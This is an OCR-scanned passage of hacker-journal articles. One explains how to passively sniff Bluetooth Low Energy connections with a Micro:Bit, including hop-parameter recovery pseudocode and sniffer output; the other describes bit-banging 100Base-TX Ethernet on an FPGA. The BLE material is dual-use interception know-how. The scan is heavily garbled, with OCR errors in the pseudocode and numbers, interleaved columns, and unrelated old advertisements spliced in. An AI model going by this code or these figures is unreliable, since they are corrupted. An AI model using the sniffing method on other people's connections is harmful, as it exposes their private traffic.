// LFLEN=0 bits, SOLEN=0, S1LEN=0 
// STATLEN=10, MAXLEN=10, BALEN=1, 


NRF RADIO->PCNF1 = 0x00010A04A ; 


Eventually, we have to disable the CRC compu- 
tation in order to make the chip consider any data 
recelved as valid. 


1| NRF RADIO—CRCCNF = 0x0; 


Identifying BLE Connections 


With this setup, we can now receive crappy data 
from the 2.4GHz bandwidth and hopefully some 
BLE packets. The problem is now to find the needle 
in the haystack, that is a valid BLE packet in the 
huge amount of data received by our nRF51822. 

A BLE packet starts with an access address, a 
32-bit carefully-chosen value that uniquely identifies 
a link between two BLE devices, as specified in the 
Bluetooth 4.2 Core Specifications document. This 
access address is followed by some PDU and a 3- 
byte CRC, but this CRC value is computed from 
a CRCInit value that is unique and associated with 
the connection. The BLE packet data is whitened in 
order to make it more tamper-resistant, and should 
be dewhitened before processing. If the connection 
is already initiated, as it is our case, the PDU is a 
Data Channel PDU with a specific two-byte header, 
as stated in the Bluetooth Low Energy specifica- 
tions. 





Header 


LLID NESN SN 
(2 bits) (1 bit) (1 bit) 
Figure 2.13: Data channel PDU header 





Length 
(8 bits) 


RFU 
(3 bits) 


MD 
(1 bit) 








When a BLE connection is established, keep- 
alive packets with a size of 0 bytes are exchanged 
between devices. 

Again, we follow the same methodology as 
Travis’ by listing all the candidate access addresses 
we get, and identifying the redundant ones. This is 
the same method chosen by Mike Ryan in its Uber- 
tooth BTLE tool from WOOT13,? with a nifty trick: 





dunzip pocorgtfo1/.pdf wooti3-ryan.pdf 
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we determine a valid access address based on the 
number of times we have seen it combined with a 
filter on its dewhitened header. We may also want 
to rely on the way the access address is generated, as 
the core specifications give a lot of extra constraints 
access address must comply with, but it is not al- 
ways followed by the different implementations of 
the Bluetooth stack. 

Once we found a valid access address, the next 
step consists in recovering the initial CRC value 
which is required to allow the nRF51822 to auto- 
matically check every packet CRC and let only the 
valid ones go through. This process is well docu- 
mented in Mike Ryan 's paper and code, so we won't 
repeat it here. 

With the correct initial CRC value and access 
address in hands, the nRF51822 is able to sniff a 
given connection s packets, but we still have a prob- 
lem. The BLE protocol implements a basic channel 
hopping mechanism to avoid sniffing. We cannot sit 
on a channel for a while without missing packets, 
and that's rather inconvenient. 


HOME & BUSINESS COMPUTERS 
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Deluxe VideO uico rrt HE Erro pre tais WA £48.50 
sie ec P £59.00 
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1| function pickUniqueChannel(a channelMap) 
aa sequences = generateSequences(a channelMap) 
3 for channel in range (0..37) do 
if (à channelMap contains channel) then do 





5 for increment in range (0..12) do 
count — 0 
7 for i in range (0..37) do 
if aa sequences|increment||i| — channel then do 
9 count = count + 1 
if count > 1 then do 
11 break 
end if 
13 end if 
end for 
15 
if count — 1 then do 
17 return channel 
end if 
19 end for 
end if 


21 end for 


23 return —l 
end function 


function computeRemapping(a channelMap) 
27 a remapping = [| 
a 
29 for channel in range (0..37) do 
if a channelMap contains channel then do 


31 a _remapping|j| = channel 
j=j+1 
33 end if 
end for 
35 


return a remapping 
37| end function 





39| function generateSequences(a channelMap) 
aa sequences = [||| 

41 remapping — computeRemapping(a channelMap) 
for i in range (0..12) do 





43 aa sequences|i| = generateSequence(i+5, à channelMap, a remapping) 
end for 
45 return aa sequences 
end function 
4T 





function generateSequence(increment , a channelMap, a remapping) 
49 channel — 0 
a sequence = || 
51 for i in range (0..37) do 
if i in à channelMap then do 


53 sequence|i] = channel 
else 

55 sequence|i| = a remapping| channel modulo size of a remapping] 
end if 

57 
channel = (channel + increment) % 37 


59 end for 
end function 


Figure 2. Hopping Algorithm 
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Following the Rabbit 


The Bluetooth Low Energy protocol defines 37 dif- 
ferent channels to transport data. In order to com- 
municate, two devices must agree on a hopping se- 
quence based on three characteristics: the hop in- 
terval, the hop increment, and the channel map. 


The first one, the hop interval, is a value spec- 
ifying the amount of time a device should sit on a 
channel before hopping to the next one. The hop 
increment is a value between 5 and 16 that specifies 
the number of channels to add to the current one 
(modulo the number of used channels) to get the 
next channel in the sequence. The last one may be 
used by a connecting device to restrict the channels 
used to the ones given in a bitmap. The channel map 
was quite a surprise for me, as it isn't mentioned in 
Ubertooth's BTLE documentation. t? 





We need to know these values in order to cap- 
ture every possible packets belonging to an active 
connection, but we cannot get them directly as we 
did not capture the connection request where we 
would find them. We need to deduce these values 
from captured packets, as we did for the CRC initial 
value. In order to find out our first parameter, the 
hop interval, Mike Ryan designed the simplest algo- 
rithm that could be: measuring the time between 
two packets received on a specific channel and di- 
viding it by the number of channels used, i.e. 37. 
5o did I, but my measures did not seem really ac- 
curate, as I got two distinct values rather than a 
unique one. I was puzzled, as it would normally 
have been straightforward as the algorithm is sim- 
ple as hell. The only explanation was that a valid 
packet was sent twice before the end of the hopping 
cycle, whereas it should only have been sent once. 
There was something wrong with the hopping cycle. 











It seems Mike Ryan made an assumption that 
was correct in 2013 but not today in 2017. I checked 
the channels used by my connecting device, a Sam- 
sung smartphone, and guess what? It was only using 
28 channels out of 37, whereas Mike assumed all 37 
data channels will be used. The good news is that 
we now know the channel map is really important, 
but the bad news is that we need to redesign the 
connection parameters recovery process. 
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Improving Mike Ryan’s Algorithm 


First of all, we need to determine the channels in use 
by listening successively on each channel for a packet 
with our expected access address and a valid CRC 
value. If we get no packet during a certain amount 
of time, then it means this channel is not part of the 
hopping sequence. Theoretically, this may take up 
to four seconds per channel, so not more than three 
minutes to determine the channel map. This is a 
significant amount of time, but luckily devices gen- 
erally use more than half of the available channels 
so it would be quicker. 





Once the channel map is recovered, we need to 
determine precisely the hop interval value associated 
with the target connection. We may want our sniffer 
to sit on a channel and measure the time between 
two valid packets, but we have a problem problem: 
if less than 37 channels are used, one or more chan- 
nels may be reused to fill the gaps. This behavior 
is due to a feature called “channel remapping” that 


unzip pocorgtfo17.pdf ubertooth.zip; unzip -c ubertooth.zip ubertooth/host/doc/ubertooth-btle.md | less 


is defined in the Bluetooth Low Energy specifica- 
tions, which basically replace an unused channel by 
another taken from the channel map. It means a 
channel may appear twice (or more) in the hopping 
sequence and therefore compromise the success of 
Mike's approach. 


3/ channels in use, no remapping: 
1. Dy obec Miu. lig. vua O3. 299 2004 
912-925 .995 24. 7994 90.7971 


28 first channels in use: 
{ 0, Pis wow O 





A possible workaround involves picking a chan- 
nel that appears only once in the hopping sequence, 
whatever the hop increment value. If we find such 
a channel, then we just have to measure the time 
between two packets, and divide this value by 37 
to recover the hop interval value. The algorithm in 
Figure 2 may be used to pick this channel. 


This algorithm finds à unique channel only if 
more than the half of the data channels are used, and 
may possibly work for a fewer number of channels 
depending on the hop increment value. This quick 
method doesn't require a huge amount of packets to 
guess the hop interval. 


The last parameter to recover is the hop incre- 
ment, and Mike's approach is also impacted by the 
number of channels in use. His algorithm measures 
the time between a packet on channel 0 and channel 
1, and then relies on a lookup table to determine 
the hop increment used. The problem is, if channel 
] appears twice then the measure is inaccurate and 
the resulting hop increment value guessed wrong. 


Again, we need to adapt this algorithm to a more 
general case. My solution is to pick a second channel 
derived from the first one we have already chosen to 
recover the hop interval value, for which the corre- 
sponding lookup table only contains unique values. 
The lookup table is built as shown in Figure 3. 


Eventually, we try every possible combination 
and only keep one that does not contain duplicate 
values, as shown in Figure 4. 


Last but not least, in Figure 5 we build the 
lookup table from these two carefully chosen chan- 
nels, if any. This lookup table will be used to deduce 
the hop increment value from the time between these 
two channels. 
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Helps to Spring Fun 


The Second 
BOYS’ BOOK 
OF MODEL 

AEROPLANES 


By Francis Arnold Collins 


The book of books for every lad, and 
every grown-up too, who has been caught 
in the fascination of model aeroplane 
experimentation, covering up to date the 
science and sport of model aeroplane 
building and flying, both in this country 
and abroad. 

There are detailed instructions for 
building fifteen of the newest models, 
with a special chapter devoted to parlor 
aviation, full instructions for building 
small paper gliders, and rules for con- 
ducting model aeroplane contests. 


The illustrations are from interesting 
photographs and helpful working draw- 
ings of over one hundred new models. 


The price, $1.20 net, postage 11 cents 


The Author’s Earlier Book 
THE BOYS’ BOOK OF 
MODEL AEROPLANES 


It tells just how to build *a glider,” a 
motor, monoplane and biplane models, 
and how to meet and remedy common 
faults—all so simply and clearly that 
any lad can get results. ‘The story of 
the history and development of aviation 
is told so accurately and vividly that it 


. cannot fail to interest and inform young 


and old. 
Many helpful illustrations 
The price, $1.20 net, postage 14 cents 


AII booksellers, or send direct to the 
publishers : 


THE CENTURY CO. 
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function generateLUT (aa sequences, firstChannel , secondChannel ) 
aa lookupTable = [||| 
for increment in range (0..12) do : 
aa _lookupTable|increment| = computeDistance(aa sequences, increment, 
firstChannel , secondChannel) 


end for 
end function 


function computeDistance(aa sequences, increment, firstChannel, secondChannel) 
distance = 0 


fclndex = findChannellndex(aa sequences, increment, firstChannel, 0) 
scIndex = findChannellndex(aa sequences, increment, secondChannel, fcIndex) 
if (scIndex > fcIndex) then do 

distance — (scIndex — fcIndex) 
else do 

distance = (scIndex — fcIndex) + 37 
end if 


return distance 
end function 


function findChannellndex(aa sequences, increment, channel, start) 
for i in range (0..37) do 


if aa sequences|increment| [( start + i) modulo 37| = channel then do 
return ((start + i) modulo 37) 
end if 
end for 


end function 





Figure 3. Channel Lookup Table 


function pickSecondChannel(aa sequences, a channelMap, firstChannel) 
for channel in range (0..37) do 
if a channelMap contains channel then do 
lookupTable = generateLUT (aa sequences, firstChannel , channel) 
duplicates — FALSE 
for i in range (0..11) do : 
for k in range (i+1 .. 12) do : 
if lookupTable[i] = lookupTable[k] then do 
duplicates — TRUE 
end if 
end for 
end for 


if not duplicates then do 
return channel 
end if 
end if 
end for 


return -1 
end function 





Figure 4. Picking the Second Channel 
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1| function deduceHopIncrement(aa _ 
measure, 
measure / hoplnterval 


sequences, 


3 channelsJumped 


LUT = generateHopIncrementLUT(aa sequences, 


5 if LUT|channelsJumped| > 0 then do 
return LUT|channelsJumped | 
7 else do 
return —l 
9 end if 
end function 


firstChannel , 


firstChannel , 


function generateHopIncrementLUT(aa_ sequences, 


reverseLUT 


generateLUT (aa | 


sequences, 

LUT = |] 

for i in range (0..37) do 
LUT[i] = 0 

end for 

for i in range (0..12) do 
LUT|reverseLUT |i |] i+5 

end for 


return LUT 
end function 


firstChannel , 
first Channel, 


secondChannel, 





hopInterval) 


secondChannel) 


secondChannel) 
secondChannel) 


Figure 5. Deducing the Hop Increment 


Patching BBC Micro:Bit 


Thanks to the designers of the BBC Micro:Bit, it 
is possible to easily develop on this platform in C 
and C++. Basically, they wrote a Device Abstrac- 
tion Layer!! that provides everything we need ex- 
cept the radio, as they developed their own custom 
protocol derived from Nordic Semiconductor Shock- 
Burst protocol. We must get rid of it. 





I removed all the useless code from this abstrac- 
tion layer, the piece of code in charge of handling 
every packet received by the RADIO module of 
our nRF51822 in particular. I then substitute this 
one with my own handler, in order to perform all 
the sniffing without being annoyed by some hidden 
third-party code messing with my packets. 





Eventually, I coded a specific firmware for the 
BBC Micro:Bit that is able to communicate with 
a Python command-line interface, and that can be 
used to detect and sniff existing connections. This 
is not perfect and still a work in progress, but it can 
passively sniff BLE connections. Of course, it may 
lack the legacy sniffing method based on capturing 
connection requests; that will be implemented later. 





This tiny tool, dubbed ubitle, is able to enu- 
merate every active Bluetooth Low Energy connec- 
tions. 





+ python3 ubitle.py —s 
[firmware version 1.0] 


uBitle v1.0 


< 46 dBm| 
| — 46 dBm] 
| — 46 dBm] 


available access addresses 
0x8a9b8e58 pkts: 1 
0x8a9b8e58 pkts: 2 
0x8a9b8e58 pkts: 3 


Listing 





It is also able to recover the channel map used 
by a given connection, as well as its hop interval and 
increment. 


+ python3 ubitle.py —f Ox8a9b8e58 
uBitle v1.0 [firmware version 1.0] 


Following connection 0x8a9b8e58 
Recovered initial CRC value: Oxl6e9df 
Recovering channel map. 
Recovered channel map: 
Recovering hop interval 
Recovered hop interval: 
Recovering hop increment 
Recovered hop increment: 


Oxlfffffffff 


48 


[i 
[i 
[i 
|i 
[i 
[i 
[i 
[i 
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llgit clone https://github.com/lancaster-university/microbit-dal 
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Once all the parameters recovered, it may also 
dump traffic to a PCAP file. 


Ji python3 ubitle.py —f Ox8a9b8e58 ^ 
—m Oxlfffffffff —o test.pcap 
uBitle v1.0 [firmware version 1.0] 


[i| Following connection 0x8a9b8e58 

[i] Recovered initial CRC value: Oxl6e9df 
[i] Forced channel map: Ox1fffffffff 

[i] Recovering hop interval 


b 
| 
| 
| 
| 


 (xbcG x06 x00X Vale |x0bvx8a0 x006 VET? 
| 
| 
| 
| 


Recovered hop interval: 48 
Recovering hop increment 
Recovered hop increment: 16 
All parameters successfully 
following BLE connection 

Data: 02 07 04 0a 

Data: 0a 0a 04 0b 

Data: 02 07 04 0a 

Data: 0a 07 04 0b 

Data: 02 07 04 0a 

Data: 0a 0a 04 0b 


i 
i 
i 
i recovered, 


LL 
LL 
LL 
LL 


75 65 74 


6f 75 65 74 





No Time 5” Destinatior Protocol Length 
"- 1 6,000000 ATT 

2 6,061094 

33.840040 ATT 

4 3.900035 ATT 

9 9,880107 ATT 

6 5,841081 ATT 


Bluetooth 

Bluetooth Low Energy Link Layer 

Bluetooth L2CAP Protocol 

Bluetooth Attribute Protocol 

p opcode: Read Response (Oxüb) 
[Handle: @xeees (unknown)] 
Value: 7B6f756574 





[Request in Frame: 1] 


58 8e 3b 8a Oa Oa 06 OO 
00 60 GO 


0000 
BALE 





The resulting PCAP file may be opened in Wire- 
shark to dissect the packets. You may notice the 
keep-alive packets are missing from this capture. It 
is deliberate; these packets are useless when analyz- 
ing Bluetooth Low Energy communications. 


Source code 


The source code of this project is available on 
Github under GPL license, feel free to submit bugs 
and pull requests. !? 





This tool does not support dynamic channel map 
update or connection request based sniffing, which 
are implemented in Nordic Semiconductor’s closed 
source sniffer. It’s PoC||GTFO so take my little tool 
as it is: a proof of concept demonstrating that it is 
possible to passively sniff BLE connections for less 
than twenty bucks, with a device one may easily find 
on the Internet. 





Info 


04 00 Ob PETRER ERE. 


unknownDirection 
uUnknownDirection 
; unknownbpirection 
; Unknownbirection 
; unknownbirection 
unknownbirection 


Read Request, Handle: Gx8663 (unknown) 
Response, Handle: Oxooo3 (Unknown) 
Request, Handle: axeages (unknown) 
Response, Handle: 8xaàaas (Unknown) 
Request, Handle: oxeaoaags (unknown) 


Response, Handle: @xeges (Unknown) 





Read 
Read 
Read 
Read 


Frame 2; 19 bytes on wire (152 bits), 19 bytes captured (152 bits) 


lżgit clone https://github.com/virtualabs/ubitle-firmware || unzip pocorgtfoi7.pdf ubitle.tgz 
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17:05 Up close and personal with Ethernet. 


If you re reading this, you've almost certainly 
used Ethernet on a PC by means of the BSD sockets 
API. You've probably poked around a bit in Wire- 
shark and looked at the TCP/IP headers on your 
packets. But what happens after the kernel pushes a 
completed Ethernet frame out to the network card? 

A PC network card typically contains three main 
components. These were separate chips in older de- 
signs, but many modern cards integrate them all 
into one IC. The bus controller speaks PCIe, PCI, 
ISA, or some other protocol to the host system, as 
well as generating interrupts and handling DMA. 
The MAC (Media Access Controller) is primarily 
responsible for adding the Ethernet framing to the 
outbound packet. The MAC then streams the out- 
bound packet over a “reconciliation sublayer" inter- 
face to the PHY (physical layer), which converts the 
packet into electrical or optical impulses to travel 
over the cabling. This same process runs in the op- 
posite direction for incoming packets. 

In an embedded microcontroller or SoC plat- 
form, the bus controller and MAC are typically in- 
tegrated on the same die as the CPU, however the 
PHY is typically a separate chip. FPGA-based sys- 
tems normally implement a MAC on the FPGA and 
connect to an external PHY as well; the bus con- 
troller may be omitted if the FPGA design sends 
data directly to the MAC. Although the bus con- 
troller and its firmware would be an interesting tar- 
get, this article focuses on the lowest levels of the 
stack. 
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by Andrew D. Zonenberg, 
because real hackers don’t need PHYs or NICs! 


MII and Ethernet framing 


The reconciliation sublayer is the lowest (fully digi- 
tal) level of the Ethernet protocol stack that is typ- 
ically exposed on accessible PCB pins. For 10/100 
Ethernet, the base protocol is known as MII (Media 
Independent Interface). It consists of seven digital 
signals each for the TX and RX buses: a clock (2.5 
MHz for 10Base-T, 25 MHz for 100Base-TX), a data 
valid flag, an error flag, and a 4-bit parallel bus con- 
taining one nibble of packet data. Other commonly 
used variants of the protocol include RMII (reduced- 
pin MII, a double-data-rate version, which uses less 
pins), GMII (gigabit MII, that increases the data 
width to 8 bits and the clock to 125 MHz), and 
RGMII (a DDR version of GMII using less pins). In 
all of these interfaces, the LSB of the data byte/nib- 
ble is sent on the wire first. 

An Ethernet frame at the reconciliation sublayer 
consists of a preamble (seven bytes of 0x55), a start 
frame delimiter (SFD, one byte of 0xD5), the 6-byte 
destination and source MAC addresses, a 2-byte 
EtherType value indicating the upper layer protocol 
(for example 0x0800 for IPv4 or 0x86DD for IPv6), 
the packet data, and a 32-bit CRC-32 of the packet 
body (not counting preamble or SFD). The byte val- 
ues for the preamble and SFD have a special signifi- 
cance that will be discussed in the following section. 


10Base-T Physical Layer 


The simplest form of Ethernet still in common use 
is known as 10Base-T (10 Mbps, baseband signal- 
ing, twisted pair media). It runs over a cable con- 
taining two twisted pairs with 100 ohm differential 
impedance. Modern deployments typically use Cat- 
egory 5 cabling, which contains four twisted pairs. 
The orange and green pairs are used for data (one 
pair in each direction), while the blue and brown 
pairs are unused. 

When the line is idle, there is no voltage dif- 
ference between the positive (white with stripe) and 
negative (solid colored) wires in the twisted pair. To 
send a 1 or 0 bit, the PHY drives 2.5V across the 
pair; the direction of the difference indicates the bit 
value. This technique allows the receiver to reject 
noise coupled into the signal from external electro- 





magnetic fields: since the two wires are very close to- 
gether the induced voltages will be almost the same, 
and the difference is largely unchanged. 

Unfortunately, we cannot simply serialize the 
data from the MII bus out onto the differential 
pair; that would be too easy! Several problems can 
arise when connecting computers (potentially sev- 
eral hundred feet apart) with copper cables. First, 
it's impossible to make an oscillator that runs at ex- 
actly 20 MHz, so the oscillators providing the clocks 
to the transmit and receive NIC are unlikely to be 
exactly in sync. Second, the computers may not 
have the same electrical ground. A few volts offset 
in ground between the two computers can lead to 
high current flow through the Ethernet cable, po- 
tentially destroying both NICs. 

In order to fix these problems, an additional line 
coding layer is used: Manchester coding. This is 
a simple 1:2 expansion that replaces a 0 bit with 
01 and a 1 bit with 10, increasing the raw data rate 
from 10 Mbps (100 ns per bit) to 20 Mbps (50 ns per 
bit). This results in a guaranteed 1-0 or 0-1 edge 
for every data bit, plus sometimes an additional edge 
between bits. 

Since every bit has a toggle in the middle of it, 
any 100 ns period without one must be the space be- 
tween bits. This allows the receiver to synchronize 
to the bit stream; and then the edge in the middle 
of each bit can be decoded as data and the receiver 
can continually adjust its synchronization on each 
edge to correct for any slight mismatches between 
the actual and expected data rate. This property of 
Manchester code is known as self clocking. 





Another useful property of the Manchester code 
is that, since the signal toggles at a minimum rate of 
10 MHz, we can AC couple it through a transformer 
or (less commonly) capacitors. This prevents any 
problems with ground loops or DC offsets between 
the endpoints, as only changes in differential voltage 
pass through the cables. 

We now see the purpose of the 55 55 ... D5 
preamble: the 0x55’s provide a steady stream of 
meaningless but known data that allows the receiver 
to synchronize to the bit clock, then the OxD5 has 
a single bit flipped at a known position. This al- 
lows the receiver to find the boundary between the 
preamble and the packet body. 

That's it! This is all it takes to encode and de- 
code a 10Base-T packet. Figure 6 shows what this 
waveform actually looks like on an oscilloscope. 


One last bit to be aware of is that, in between 
packets, a link integrity pulse (LIT) is sent every 16 
milliseconds of idle time. This is simply a +2.5V 
pulse about 100 ns long, to tell the remote end, “I’m 
still here.” The presence or absence of LITs or data 
traffic is how the NIC decides whether to declare the 
link up. 





By this point, dear reader, you're probably 
thinking that this doesn't sound too hard to bit- 
bang — and you'd be right! This has in fact been 
done, most notably by Charles Lohr on an AT Tiny 
microcontroller.‘? All you need is a pair of 2.5V 
GPIO pins to drive the output, and a single input 
pin. 


100Base-TX Physical Layer 


The obvious next question is, what about the next 
step up, 100Base-T X Ethernet? A bit of Googling 
failed to turn up anyone who had bit-banged it. How 
hard can it really be? Let's take a look at this pro- 
tocol in depth! 

First, the two ends of the link need to decide 
what speed they're operating at. This uses a clever 
extension of the 10Base-T LIT signaling: every 16 
ms, rather than sending a single LIT, the PHY sends 
17 pulses — identical to the 10Base-T LIT, but re- 
named fast link pulse (FLP) in the new standard 
— at 125 us spacing. Each pair of pulses may op- 
tionally have an additional pulse halfway between 
them. The presence or absence of this additional 
pulse carries a total of 16 bits of data. 

Since FLPs look just like 10Base-T LITs, an 
older PHY which does not understand Ethernet 
auto-negotiation will see this stream of pulses as 
a valid 10Base-T link and begin to send packets. 
A modern PHY will recognize this and switch to 
10Base-T mode. If both ends support autonego- 
tiation, they will exchange feature descriptors and 
switch to the fastest mutually-supported operating 
mode. 








Figure 7 shows an example auto-negotiation 
frame. The left 5 data bits indicate this is an 802.3 
base auto-negotiation frame (containing the feature 
bitmask); the two 1 data bits indicate support for 
100Base-TX at both half and full duplex. 

Supposing that both ends have agreed to operate 
at 100Base-T X, what happens next? Let's look at 
the journey a packet takes, one step at a time from 
the sender's MII bus to the receiver's. 


l3git clone https://github.com/cnlohr/ethertiny || unzip pocorgtfoi7.pdf ethertiny.zip 
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Figure 6. 10Base-T Waveform 
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Figure 7. Autonegotiation Frame 


First, the 4-bit nibble is expanded into 5 bits by a rather unusual modulation known as MLT-3. This 








a table lookup. This 4B/5B code adds transitions to is a pseudo-sine waveform which cycles from OV to 
the signal just like Manchester coding, to facilitate +1V, back to 0V, down to —1V, and then back to 
clock synchronization at the receiver. Additionally, 0 again. To send a 1 bit the waveform is advanced 
some additional codes (not corresponding to data to the next cycle; to send a 0 bit it remains in the 
nibbles) are used to embed control information into current state for 8 nanoseconds. The following is an 
the data stream. These are denoted by letters in the example of MLI-3 coded data transmitted by one 
standard. of my Cisco switches, after traveling through sev- 
The first two nibbles of the preamble are then eral meters of cable. 





replaced with control characters J and K. The re- | h^ rcr mg gl 
maining nibbles in the preamble, SFD, packet, and bee i ‘ide | abil f] PM d | ii 
CRC are expanded to their 5-bit equivalents. Con- —— ——— —————M——— 





trol characters T and R are appended to the end of Eum | pend ded e V bessa! error ci | TERT ay nium | | 
the packet. Finally, unlike 10Base-T, the link does | | "R n Gy mE err "FE pps 
not go quiet between packets; instead, the control | — 
character I (idle) is continuously transmitted. MLT-3 is used because it is far more spectrally 
The encoded parallel data stream is serialized to efficient than the Manchester code used in 10Base- 
a single bit at 125 Mbps, and scrambled by XOR- T. Since it takes four 1 bits to trigger a full cycle 
ing it with a stream of pseudorandom bits from a of the waveform, the maximum frequency is 1/4 of 


linear feedback shift register, using the polynomial the 125 Mbps line rate, or 31.25 MHz. This is only 
all+a +1. If the data were not scrambled, pat- about 1.5 times higher than the 20 MHz bandwidth 





terns in the data (especially the idle control char- required to transmit 10Base-T, and allows 100Base- 
acter) would result in periodic signals being driven TX to be transmitted over most cabling capable of 
onto the wire, potentially causing strong electromag- carrying 10Base-T. 

netic interference in nearby equipment. By scram- The obvious question is, can we bit-bang it? Cer- 
bling the signal these patterns are broken up, and tainly! Since I didn't have a fast enough MCU, I 
the radiated noise emits weakly across a wide range built a test board (Figure 8) around an old Spartan- 
of frequencies rather than strongly in one. 6 FPGA left over from an abandoned project years 

Finally, the scrambled data is transmitted using ago. 
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Figure 8. Spartan-6 Test Board 
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Bit-Banging 100Base-T X 


A block diagram of the PHY, randomly code-named 
TRAGICLASER by @NSANameGen", is shown in 
Figure 9. 

The transmit-side 4B /5B coding, serializing, and 
LFSR scrambler are straightforward digital logic at 
moderate to slow clock rates in the FPGA, so we 
won't discuss their implementation in detail. 

Generating the signal requires creating three dif- 
ferential voltages: 0, +1, and —1. Since most FPGA 
I/O buffers cannot operate at 1.0V, or output neg- 
ative voltages, a bit of clever circuitry is required. 

We use a pair of 1K ohm resistors to bias the 
center tap of the output transformer to half of the 
3.3V supply voltage (1.65V). The two ends of the 
transformer coil are connected to FPGA I/O pins. 
Since each I/O pin can pull high or low, we have 
a form of the classic H-bridge motor driver circuit. 
By setting one pin high and the other low, we can 
drive current through the line in either direction. 
By tri-stating both pins and letting the terminating 
resistor dissipate any charge built up in the cable 
capacitance, we can create a differential O state. 

Since we want to drive +/— 1V rather than 3.3V, 
we need to add a resistor in series with the FPGA 
pins to reduce the drive current such that the re- 
ceiver sees 1V across the 100 ohm terminator. Ex- 
perimentally, good results were obtained with 100 
ohm resistors in series with a Spartan-6 FPGA pin 
configured as LVCMOS33, fast slew, 24 mA drive. 
For other FPGAs with different drive characteris- 
tics, the resistor value may need to be slightly ad- 
justed. This circuit is shown in Figure 10. 

This produced a halfway decent MLI-3 wave- 
form, and one that would probably be understood 
by a typical PHY, but the rise and fall times as the 
signal approached the OV state were slightly slower 
than the 5 ns maximum permitted by the 802.3 stan- 
dard (see Figure 11). 

The solution to this is a clever technique from 
the analog world known as pre-emphasis. This is a 
fancy way of saying that you figure out what dis- 
tortions your signal will experience in transit, then 
apply the reverse transformation before sending it. 
In our case, we have good values when the signal is 
stable but during the transitions to zero there's not 
enough drive current. To compensate, we simply 
need to give the signal a kick in the right direction. 








Luckily for us, 10Base-T requires a pretty hefty 
dose of drive current. In order to ensure we could 
drive the line hard enough, two more FPGA pins 
were connected in parallel to each side of the T'X- 
side transformer through 16-ohm resistors. By par- 
alleling these two pins, the available current is sig- 
nificantly increased. 

After a bit of tinkering, I discovered that by 
configuring one of the 10Base-T drive pins as LVC- 
MOS33, slow slew, 2 mA drive, and turning it on for 
2 nanoseconds during the transition from the +/—1 
state to the 0 state, I could provide just enough 
of a shove that the signal reached the zero mark 
quickly while not overshooting significantly. Since 
the PHY itself runs at only 125 MHz, the Spartan-6 
OSERDES2 block was used to produce a pulse last- 
ing 1/4 of a PHY clock cycle. Figure 12 shows the 
resulting waveforms.!° 

At this point sending the auto-negotiation wave- 
forms is trivial: The other FPGA pin connected to 
the 16 ohm resistor is turned on for 100 ns, then 
off. With a Spartan-6 I had good results with LVC- 
MOS33, fast slew, 24 mA drive for these pins. If ad- 
ditional drive strength is required the pre-emphasis 
drivers can be enabled in parallel, but I didn't find 
this to be necessary in my testing. 

These same pins could easily be used for 10Base- 
T output as well (to enable a dual-mode 10/100 
PHY) but I didn't bother to implement this. People 
have already demonstrated successful bitbanging of 
10Base-T, and it's not much of a POC if the concept 
is already proven. 

That's it, we're done! We can now send 100Base- 
TX signals using six FPGA pins and six resistors! 


Decoding 100Base-T X 


Now that we can generate the signals, we have to 
decode the incoming data from the other side. How 
can we do this? 

Most modern FPGAs are able to accept differ- 
ential digital inputs, such as LVDS, using the I/O 
buffers built into the FPGA. These differential in- 
put buffers are essentially comparators, and can be 
abused into accepting analog signals within the op- 
erating range of the FPGA. 

By connecting an input signal to the positive 
input of several LVDS input buffers, and driving 
the negative inputs with an external resistor ladder, 





lihttps://twitter.com/NSANameGen/status/910628839566594050 
15This wavefrom was captured with a 115 ohm drive resistor instead of 100, causing the output voltage to be closer to 0.9V 
than the intended 1.0V. After correcting the resistor value, the amplitude was close to perfect. 


| TX MII interface 4B/5B coder MLT-3 coder H-bridge 


Ethernet 
magnetics 





Elastic buffer 4B/5B decoder MLT-3 decoder : External 
: fixed V-ref 


On FPGA : 


Figure 9. TRAGICLASER Block Diagram 





Vdd/2 bias on diffpairs 


Figure 10. H-Bridge Schematic 
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Figure 11. Halfway-Decent Waveform 
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Figure 12. Waveform using Premphasis 


we can create a low-resolution flash ADC! Since we 
only need to distinguish between three voltage lev- 
els (there's no need to distinguish the +1 and +2.5, 
or —1 and —2.5, states as they're never used at the 
same time) we can use two comparators to create an 
ADC with approximately 1.5 bit resolution. 

There's just one problem: this is a single-ended 
ADC with an input range from ground to Vdd, and 
our incoming signal is differential with positive and 
negative range. Luckily, we can work around this 
by tying the center tap of the transformer to 1.65V 
via equal valued resistors to 3.3V and ground, thus 
biasing the signal into the 0-3.3V range. See Fig- 
ure 13. 

After we connect the required 100 ohm terminat- 
ing resistor across the transformer coil, the voltages 
at the positive and negative sides of the coil should 
be equally above and below 1.65V. We can now con- 
nect our ADC to the positive side of the coil only, 
ignoring the negative leg entirely aside from the ter- 
mination. 

The ADC is sampled at 500 Msps using the 
Spartan-6 ISERDES. Since the nominal data rate 
is 125 Mbps, we have four ADC samples per unit 
interval (UI). We now need to recover the MLT-3 
encoded data from the oversampled data stream. 

The MLT-3 decoder runs at 125 MHz and pro- 
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cesses 4 ADC samples per cycle. Every time the 
data changes the decoder outputs a 1 bit. Every 
time the data remains steady for one UI, plus an 
additional sample before and after, the decoder out- 
puts a 0 bit. (The threshold of six ADC samples was 
determined experimentally to give the best bit error 
rate.) The decoder nominally outputs one data bit 
per clock however due to jitter and skew between 
the TX and RX clocks, it occasionally outputs zero 
or two bits. 

The decoded data stream is then deserialized 
into 5-bit blocks to make downstream processing 
easier. Every 32 blocks, the last 11 bits from the 
MLI-3 decoder are complemented and loaded into 
the LFSR state. Since the 4B/5B idle code is 
Ox1F (five consecutive 1 bits), the complement of 
the scrambled data between packets is equal to the 
scrambler PRNG output. An LFSR leaks 1 bit of 
internal state per output bit, so given N consecu- 
tive output bits from a N-bit LFSR, we can recover 
the entire state. The interval of 32 blocks (160 bits) 
was chosen to be relatively prime to the 11-bit LFSR 
state size. 

After the LFSR is updated, the receiver begins 
XOR-ing the scrambler output with the incoming 
data stream and checks for nine consecutive idle 
characters (45 bits). If present, we correctly guessed 
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Figure 13. Biasing Schematic 


the location of an inter-packet gap and are locked to 
the scrambler, with probability 1 — (2745) of a false 
lock due to the data stream coincidentally match- 
ing the LFSR output. If not present, we guessed 
wrong and re-try every 32 data blocks until a lock 
is achieved. Since 100Base-T X specifies a minimum 
96-bit inter-frame gap, and we require 45 + 11 = 56 
idle bits to lock, we should eventually guess right 
and lock to the scrambler. 

Once the scrambler is locked, we can XOR the 
scrambler output (5 bits at a time) with the incom- 
ing 5-bit data stream. This gives us cleartext 4B/5B 
data, however we may not be aligned to code-word 
boundaries. The idle pattern doesn't contain any 
bit transitions so there's no clues to alignment there. 
